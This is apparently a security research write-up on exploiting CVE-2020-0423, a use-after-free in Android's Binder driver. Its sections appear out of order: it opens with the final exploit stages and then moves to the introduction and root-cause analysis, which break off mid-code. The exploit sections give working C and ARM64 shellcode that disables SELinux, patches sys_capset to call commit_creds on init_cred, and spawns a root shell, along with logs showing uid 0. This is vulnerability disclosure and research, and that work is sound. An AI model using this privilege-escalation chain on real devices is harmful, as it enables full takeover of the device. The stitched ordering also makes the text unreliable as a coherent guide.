[6498] exploit.c:431:trigger_thread_func(): BSS alloc will be @ffffff9a12f45158

[6498] exploit.c:437:trigger_thread_func(): Value @X after changing overlapping_fd is ffffff9a12f45158

[6498] exploit.c:483:trigger_thread_func(): Value @X after changing overlapping_fd is ffffff9a12f45178

[6397] exploit.c:508:trigger_thread_func(): Kernel text value = 148cc000

We can also notice that the first four bytes of the section we mapped correspond to the beginning of the vmlinux binary:

lyte@debian:~$ xxd vmlinux | head

00000000: 00c0 8c14 0000 0000 0000 0800 0000 0000 ................

00000010: 0070 2303 0000 0000 0a00 0000 0000 0000 .p#.............

00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................

Escalating to Root

We're now at the final stage of the exploit. In this section, we'll leverage our arbitrary kernel read/write to disable SELinux, modify our process' credentials and finally get a root shell.

SELinux Bypass

This part is pretty straightforward and common for Android exploits. We just have to set selinux_enforcing to 0.

/* selinux_enforcing address in the remapped kernel region */

uint64_t selinux_enforcing_addr = base + 0x80000 + SELINUX_ENFORCING;

debug_printf("Before: enforcing = %x\n", *(uint32_t *)selinux_enforcing_addr);

/* setting selinux_enforcing to 0 */

*(uint32_t *)selinux_enforcing_addr = 0;

debug_printf("After: enforcing = %x\n", *(uint32_t *)selinux_enforcing_addr);

With the snippet of code given above, you should see an output similar to this:

[6397] exploit.c:508:trigger_thread_func(): Before: enforcing = 1

[6397] exploit.c:508:trigger_thread_func(): After: enforcing = 0

Init Credentials

The last remaining issue is to get root permissions for our process. To achieve this, we will use our read/write primitive to temporarily patch a syscall handler. In our case, we will patch sys_capset, but in practice any syscall could be used. Just pick one that is unlikely to be called by something else while the exploit is running.

In order to get root's permissions and capabilities, we will change our exploit process' credentials to init's credentials. A simple commit_creds on init_cred will do the trick.

A potential C implementation of this process could be as follows:

#define LO_DWORD(addr) ((addr) & 0xffffffff)

#define HI_DWORD(addr) LO_DWORD((addr) >> 32)

/* Preparing addresses for the shellcode */

uint64_t sys_capset_addr = base + 0x80000 + SYS_CAPSET;

uint64_t init_cred_addr = kaslr_leak + INIT_CRED;

uint64_t commit_creds_addr = kaslr_leak + COMMIT_CREDS;

uint32_t shellcode[] = {

// commit_creds(init_cred)

0x58000040, // ldr x0, .+8

0x14000003, // b .+12

LO_DWORD(init_cred_addr),

HI_DWORD(init_cred_addr),

0x58000041, // ldr x1, .+8

0x14000003, // b .+12

LO_DWORD(commit_creds_addr),

HI_DWORD(commit_creds_addr),

0xA9BF7BFD, // stp x29, x30, [sp, #-0x10]!

0xD63F0020, // blr x1

0xA8C17BFD, // ldp x29, x30, [sp], #0x10

0x2A1F03E0, // mov w0, wzr

0xD65F03C0, // ret

};

/* Saving sys_capset current code */

uint8_t sys_capset[sizeof(shellcode)];

memcpy(sys_capset, (void *)sys_capset_addr, sizeof(sys_capset));

/* Patching sys_capset with our shellcode */

debug_print("Patching SyS_capset()\n");

memcpy((void *)sys_capset_addr, shellcode, sizeof(shellcode));

/* Calling our patched version of sys_capset */

ret = capset(NULL, NULL);

debug_printf("capset returned %d", ret);

if (ret < 0) perror("capset failed");

/* Restoring sys_capset */

debug_print("Restoring SyS_capset()");

memcpy((void *)sys_capset_addr, sys_capset, sizeof(sys_capset));

/* Starting a shell */

system("sh");

exit(0);

Root Shell

Finally, we can put everything together and start the exploit to obtain a root shell.

[6397] exploit.c:508:trigger_thread_func(): Patching SyS_capset()

[6397] exploit.c:585:trigger_thread_func(): capset returned 0

[6397] exploit.c:588:trigger_thread_func(): Restoring SyS_capset()

id

uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0

uname -a

Linux localhost 4.14.170-g5513138224ab-ab6570431 #1 SMP PREEMPT Tue Jun 9 02:18:01 UTC 2020 aarch64

References

- Binder Transactions In The Bowels of the Linux Kernel - Synacktiv

- Exploiting CVE-2020-0041: Escaping the Chrome Sandbox - Blue Frost Security

- Android Kernel Sources - Before the patch for CVE-2020-0423

- Service Manager Sources

- Building a Pixel kernel with KASAN+KCOV

- The SLUB allocator - PaoloMonti42

- Google Developers - Pixel 4 "flame" factory images

- Mitigations are attack surface, too - Project Zero

- CVE-2017-11176: A step-by-step Linux Kernel exploitation - Lexfo

- Part 1: https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html

- Part 2: https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part2.html

- Part 3: https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html

- Part 4: https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html

- KSMA: Breaking Android kernel isolation and Rooting with ARM MMU features - ThomasKing

Introduction

In the Android Security Bulletin of October, the vulnerability CVE-2020-0423 was made public with the following description:

In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.

CVE-2020-0423 is yet another vulnerability in Android that can lead to privilege escalation. In this post, we will describe the bug and construct an exploit that can be used to gain root privileges on an Android device.

Root Cause Analysis of CVE-2020-0423

A Brief Overview of Binder

Processes on Android are isolated and cannot access each other's memory directly. However they might require to, whether it's for exchanging data between a client and a server or simply to share information between two processes.

Interprocess communication on Android is performed by Binder. This kernel component provides a user-accessible character device which can be used to call routines in remote process and pass arguments to it. Binder acts as a proxy between two tasks and is also responsible, among others, for handling memory allocations during data exchange as well as managing shared object's lifespans.

If you're not familiar with Binder's internals, we invite you to read articles on the subject, such as Synacktiv's "Binder Transactions In The Bowels of the Linux Kernel". It will come in handy to understand the rest of this post.

Patch Analysis and Brief Explanation

The patch for CVE-2020-0423 was upstreamed on October 10th in the Linux kernel with the following commit message:

binder: fix UAF when releasing todo list

When releasing a thread todo list when tearing down a binder_proc, the following race was possible which could result in a use-after-free:

- Thread 1: enter binder_release_work from binder_thread_release

- Thread 2: binder_update_ref_for_handle() -> binder_dec_node_ilocked()

- Thread 2: dec nodeA --> 0 (will free node)

- Thread 1: ACQ inner_proc_lock

- Thread 2: block on inner_proc_lock

- Thread 1: dequeue work (BINDER_WORK_NODE, part of nodeA)

- Thread 1: REL inner_proc_lock

- Thread 2: ACQ inner_proc_lock

- Thread 2: todo list cleanup, but work was already dequeued

- Thread 2: free node

- Thread 2: REL inner_proc_lock

- Thread 1: deref w->type (UAF)

The problem was that for a BINDER_WORK_NODE, the binder_work element must not be accessed after releasing the inner_proc_lock while processing the todo list elements since another thread might be handling a deref on the node containing the binder_work element leading to the node being freed.

This commit message gives a rough overview of the steps required to trigger a use-after-free, or UAF, using this bug. These steps will be detailed in the next section; for now, let's look at the patch to understand where the vulnerability comes from.

In essence, this patch inlines the content of the function binder_dequeue_work_head into binder_release_work. The only difference is that the type field of the binder_work struct is now read while the lock on proc is still held.

// Before the patch

static struct binder_work *binder_dequeue_work_head(

struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

binder_inner_proc_lock(proc);

w = binder_dequeue_work_head_ilocked(list);

binder_inner_proc_unlock(proc);

return w;

}

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list);

/*

* From this point on, there is no lock on `proc` anymore

* which means `w` could have been freed in another thread and

* therefore be pointing to dangling memory.

*/

if (!w)

return;

switch (w->type) { /* <--- Use-after-free occurs here */

// [...]

// After the patch

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

enum binder_work_type wtype;

while (1) {

binder_inner_proc_lock(proc);

/*

* Since the lock on `proc` is held while calling

* `binder_dequeue_work_head_ilocked` and reading the `type` field of

* the resulting `binder_work` struct, we can be sure its value has not

* been tampered with.

*/

w = binder_dequeue_work_head_ilocked(list);

wtype = w ? w->type : 0;

binder_inner_proc_unlock(proc);

if (!w)

return;

switch (wtype) { /* <--- Use-after-free not possible anymore */

// [...]
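To make the difference between the two orderings concrete, here is a small userland model of it. This is only a sketch under our own assumptions: the `toy_` names are hypothetical, no real locking or freeing takes place, and the "other thread" is simulated by a callback that runs exactly where the kernel code has already dropped the lock.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-ins for the kernel types, for illustration only. */
enum toy_work_type { TOY_WORK_NODE = 1, TOY_WORK_ATTACKER = 99 };

struct toy_work {
    enum toy_work_type type;
};

/* Runs at the point where the lock has been released; it plays the
 * role of "Thread 2" in the commit message. */
typedef void (*toy_race_window_fn)(struct toy_work *w);

/* Models a free followed by a reallocation filled with attacker data.
 * Nothing is really freed here, the field is simply overwritten. */
static void toy_reuse_memory(struct toy_work *w)
{
    w->type = TOY_WORK_ATTACKER;
}

/* Unpatched ordering: the type is read after the race window. */
static enum toy_work_type toy_release_unpatched(struct toy_work *w,
                                                toy_race_window_fn window)
{
    assert(w != NULL);
    /* lock; dequeue; unlock */
    window(w);          /* the other thread gets to run here */
    return w->type;     /* late read: sees whatever is there now */
}

/* Patched ordering: the type is copied while the lock is still held. */
static enum toy_work_type toy_release_patched(struct toy_work *w,
                                              toy_race_window_fn window)
{
    assert(w != NULL);
    /* lock; dequeue; copy type; unlock */
    enum toy_work_type wtype = w->type;
    window(w);
    return wtype;       /* unaffected by what happened in the window */
}
```

With `toy_reuse_memory` as the window callback, the unpatched variant returns the overwritten value while the patched variant still returns the original type, which is the whole point of reading `w->type` before unlocking.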

Before this patch, it was possible to dequeue a binder_work struct and have another thread free and reallocate it, thereby changing the control flow of binder_release_work. The next section gives a more thorough explanation of why this behavior occurs and how it can be triggered at will.

In-Depth Analysis

In this section, as an example, let's imagine that there are two processes communicating using binder: a sender and a receiver.

At this point, there are three prerequisites to trigger the bug:

- a call to binder_release_work from the sender's thread

- a binder_work structure to dequeue from the sender thread's todo list

- a free on the binder_work structure from the receiver thread

Let's go over them one by one and try to figure out a way to fulfill them.

Calling binder_release_work

This prerequisite is pretty straightforward. As explained earlier, binder_release_work is part of the cleanup routine that runs when a task is done using binder. It can be called explicitly in a thread using the ioctl command BINDER_THREAD_EXIT.

// Userland code from the exploit

int binder_fd = open("/dev/binder", O_RDWR);

// [...]

ioctl(binder_fd, BINDER_THREAD_EXIT, 0);
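For readers who want something they can compile, the call can be wrapped in a small helper. This is a sketch rather than the exploit's actual code: the helper name is ours, and BINDER_THREAD_EXIT is redefined locally (with the value used in the kernel's UAPI header) only so that the snippet builds on systems without `<linux/android/binder.h>`.

```c
#include <stdint.h>
#include <sys/ioctl.h>

/* Same definition as in <linux/android/binder.h>; repeated here only
 * so that the sketch builds without that header. */
#ifndef BINDER_THREAD_EXIT
#define BINDER_THREAD_EXIT _IOW('b', 8, int32_t)
#endif

/* Hypothetical helper: asks the binder driver to tear down the state
 * of the calling thread. Returns 0 on success, -1 on failure, in
 * which case errno is set by ioctl(). */
static int binder_thread_exit(int binder_fd)
{
    return ioctl(binder_fd, BINDER_THREAD_EXIT, 0) < 0 ? -1 : 0;
}
```

The file descriptor is expected to come from an earlier `open("/dev/binder", O_RDWR)`; passing an invalid descriptor simply makes the helper return -1.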

This ioctl will end up calling the kernel function binder_ioctl located at drivers/android/binder.c.

binder_ioctl will then reach the BINDER_THREAD_EXIT case and call binder_thread_release. thread is a binder_thread structure containing information about the current thread which made the ioctl call.

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)

{

// [...]

case BINDER_THREAD_EXIT:

binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",

proc->pid, thread->pid);

binder_thread_release(proc, thread);

thread = NULL;

break;

// [...]

Near the end of binder_thread_release appears the call to binder_release_work.

static int binder_thread_release(struct binder_proc *proc,

struct binder_thread *thread)

{

// [...]

binder_release_work(proc, &thread->todo);

binder_thread_dec_tmpref(thread);

return active_transactions;

}

Notice that the call to binder_release_work has the value &thread->todo for the parameter struct list_head *list. This will become relevant in the following section when we try to populate this list with binder_work structures.

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */

if (!w)

return;

// [...]

Now that we know how to trigger the vulnerable function, let's determine how we can fill the thread->todo list with arbitrary binder_work structures.

Dequeueing a binder_work Structure of the Sender Thread

binder_work structures are enqueued into thread->todo at two locations:

static void

binder_enqueue_deferred_thread_work_ilocked(struct binder_thread *thread,

struct binder_work *work)

{

binder_enqueue_work_ilocked(work, &thread->todo);

}

static void

binder_enqueue_thread_work_ilocked(struct binder_thread *thread,

struct binder_work *work)

{

binder_enqueue_work_ilocked(work, &thread->todo);

thread->process_todo = true;

}
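The only difference between the two helpers is the process_todo flag; both append the work item to the same list. The following userland model illustrates this with a minimal copy of the kernel's intrusive list. It is a sketch under our own assumptions: all `toy_` names are hypothetical, locking is omitted, and only the fields needed for the illustration are kept.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Minimal userland version of the kernel's circular doubly linked list. */
struct list_head { struct list_head *next, *prev; };

static void toy_list_init(struct list_head *h) { h->next = h; h->prev = h; }
static bool toy_list_empty(const struct list_head *h) { return h->next == h; }

static void toy_list_add_tail(struct list_head *entry, struct list_head *head)
{
    entry->prev = head->prev;
    entry->next = head;
    head->prev->next = entry;
    head->prev = entry;
}

static void toy_list_del_init(struct list_head *entry)
{
    entry->prev->next = entry->next;
    entry->next->prev = entry->prev;
    toy_list_init(entry);
}

/* Simplified stand-ins for binder_work and binder_thread. */
struct toy_work { struct list_head entry; int type; };
struct toy_thread { struct list_head todo; bool process_todo; };

/* Deferred variant: queue the work, do not flag the thread. */
static void toy_enqueue_deferred(struct toy_thread *t, struct toy_work *w)
{
    toy_list_add_tail(&w->entry, &t->todo);
}

/* Regular variant: queue the work and flag the thread. */
static void toy_enqueue(struct toy_thread *t, struct toy_work *w)
{
    toy_list_add_tail(&w->entry, &t->todo);
    t->process_todo = true;
}

/* Pops the oldest work item, or returns NULL if the list is empty. */
static struct toy_work *toy_dequeue_head(struct toy_thread *t)
{
    assert(t != NULL);
    if (toy_list_empty(&t->todo))
        return NULL;
    struct list_head *first = t->todo.next;
    toy_list_del_init(first);
    /* entry is the first member, so this cast recovers the toy_work. */
    return (struct toy_work *)first;
}
```

In both cases the item ends up on `todo`, which is all that matters for binder_release_work: it drains the list regardless of the flag.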

These functions are used in different places in the code, but an interesting code path is the one starting in binder_translate_binder. This function is called when a thread sends a transaction containing a BINDER_TYPE_BINDER or a BINDER_TYPE_WEAK_BINDER.

A binder node is created from this binder object and the reference counter for the process on the receiving end is increased. As long as the receiving process holds a reference to this node, it will stay alive in Binder's memory. However, if the process releases the reference, the node is destroyed, which is what we will try to achieve later on to trigger the UAF.
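The lifetime rule described above can be pictured with a toy reference counter. This is a deliberately simplified sketch: the real binder_node tracks several kinds of references (strong, weak, local, internal), whereas the hypothetical `toy_node` below keeps a single counter just to show that the last release is what frees the object.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>

/* Hypothetical, heavily simplified stand-in for binder_node. */
struct toy_node {
    int remote_refs;   /* references held by receiving processes */
};

static struct toy_node *toy_node_new(void)
{
    struct toy_node *n = calloc(1, sizeof(*n));
    assert(n != NULL);
    return n;
}

/* The sender passes the object along: the receiver gains a reference. */
static void toy_node_get(struct toy_node *n)
{
    n->remote_refs++;
}

/* The receiver drops a reference. Returns true if this call freed the
 * node, after which the pointer must not be used anymore. */
static bool toy_node_put(struct toy_node *n)
{
    assert(n->remote_refs > 0);
    if (--n->remote_refs > 0)
        return false;
    free(n);
    return true;
}
```

Any pointer into the node that is still held elsewhere when `toy_node_put` returns true is dangling, which is the situation the exploit aims to create.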

First, let's explain how the binder node and the thread->todo list are related in the call to binder_inc_ref_for_node.

static int binder_translate_binder(struct flat_binder_object *fp,

struct binder_transaction *t,

struct binder_thread *thread)

{

// [...]

ret = binder_inc_ref_for_node(target_proc, node,

fp->hdr.type == BINDER_TYPE_BINDER,

&thread->todo, &rdata);

// [...]

}

The parameters of binder_inc_ref_for_node are as follows:

- struct binder_proc *proc: process that will hold a reference to the node

- struct binder_node *node: target node

- bool strong: true=strong reference, false=weak reference

- struct list_head *target_list: worklist to use if node is incremented

- struct binder_ref_data *rdata: the id/refcount data for the ref

target_list in our current path is thread->todo. This parameter is only used in binder_inc_ref_for_node in the call to binder_inc_ref_olocked.

static int binder_inc_ref_for_node(struct binder_proc *proc,

struct binder_node *node,

bool strong,

struct list_head *target_list,

struct binder_ref_data *rdata)

{

// [...]

ret = binder_inc_ref_olocked(ref, strong, target_list);

// [...]

}

binder_inc_ref_olocked then calls binder_inc_node whether it's a weak or a strong reference.

static int binder_inc_ref_olocked(struct binder_ref *ref, int strong,

struct list_head *target_list)

{

// [...]

// Strong ref path

ret = binder_inc_node(ref->node, 1, 1, target_list);

// [...]

// Weak ref path

ret = binder_inc_node(ref->node, 0, 1, target_list);

// [...]

}

binder_inc_node is a simple wrapper around binder_inc_node_nilocked holding a lock on the current node.

binder_inc_node_nilocked finally calls:

- binder_enqueue_deferred_thread_work_ilocked if there is a strong reference on the node

- binder_enqueue_work_ilocked if there is a weak reference on the node

In practice, it does not matter whether the reference is weak or strong.

static int binder_inc_node_nilocked(struct binder_node *node, int strong,

int internal,

struct list_head *target_list)

{

// [...]

if (strong) {

// [...]

if (!node->has_strong_ref && target_list) {

// [...]

binder_enqueue_deferred_thread_work_ilocked(thread,

&node->work);

}

} else {

// [...]

if (!node->has_weak_ref && list_empty(&node->work.entry)) {

// [...]

binder_enqueue_work_ilocked(&node->work, target_list);

}

}

return 0;

}

Notice here that it's actually the node->work field that is enqueued in the thread->todo list and not just a plain binder_work structure. This is because binder_node embeds a binder_work structure. This means that, to trigger the bug, we don't want to free a specific binder_work structure, but a whole binder_node.
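The embedding can be illustrated with a few lines of userland C. The layout below is a hypothetical, trimmed-down version of the kernel structures (only the fields needed for the illustration), and `toy_container_of` mimics the kernel's container_of macro.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-in for binder_work. */
struct toy_work {
    int type;
};

/* Simplified stand-in for binder_node: the work item is stored
 * inside the node itself, not behind a pointer. */
struct toy_node {
    int debug_id;
    struct toy_work work;
    int refs;
};

/* Userland equivalent of the kernel's container_of(). */
#define toy_container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Recovers the enclosing node from a pointer to its embedded work. */
static struct toy_node *toy_node_from_work(struct toy_work *w)
{
    assert(w != NULL);
    return toy_container_of(w, struct toy_node, work);
}
```

Since `&node->work` points inside the node's own allocation, freeing the node also invalidates every pointer to its work item that may still be sitting in a local variable after it was dequeued from a todo list.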

At this stage, we know how to arbitrarily fill the thread->todo list and how to call the vulnerable function binder_release_work to access a potentially freed binder_work/binder_node structure. The only step that remains is to figure out a way to free a binder_node we allocated in our thread.

Freeing the binder_work Structure From the Receiver Thread

Up to this point, we only looked at the sending thread's side. Now we'll explain what needs to happen on the receiving end for the node to be freed.

The function responsible for freeing a node is binder_free_node.

static void binder_free_node(struct binder_node *node)

{

kfree(node);

binder_stats_deleted(BINDER_STAT_NODE);

}

This function is called in different places in the code, but an interesting path to follow is when binder receives a BC_FREE_BUFFER transaction command. The reason for choosing this code path in particular is twofold.

- The first thing to note is that not all processes are allowed to register as a binder service. While it's still possible to do it by abusing the ITokenManager service, we chose to use the already registered services (e.g. servicemanager, gpuservice, etc.).

- The second reason is that since we chose to communicate with existing services, we would have to use an existing code path inside one of those that would let us free a node.

Fortunately, this is the case for BC_FREE_BUFFER which is used by the binder service to clean up once the transaction has been handled. An example with servicemanager is given below.

In binder_parse, once a transaction has been handled, servicemanager calls either binder_free_buffer, if it's a one-way transaction, or binder_send_reply otherwise.

int binder_parse(struct binder_state *bs, struct binder_io *bio,

uintptr_t ptr, size_t size, binder_handler func)

{

// [...]

switch(cmd) {

// [...]

case BR_TRANSACTION_SEC_CTX:

case BR_TRANSACTION: {

// [...]

if (func) {

// [...]

if (txn.transaction_data.flags & TF_ONE_WAY) {

binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);

} else {

binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);

}

}

break;

}

// [...]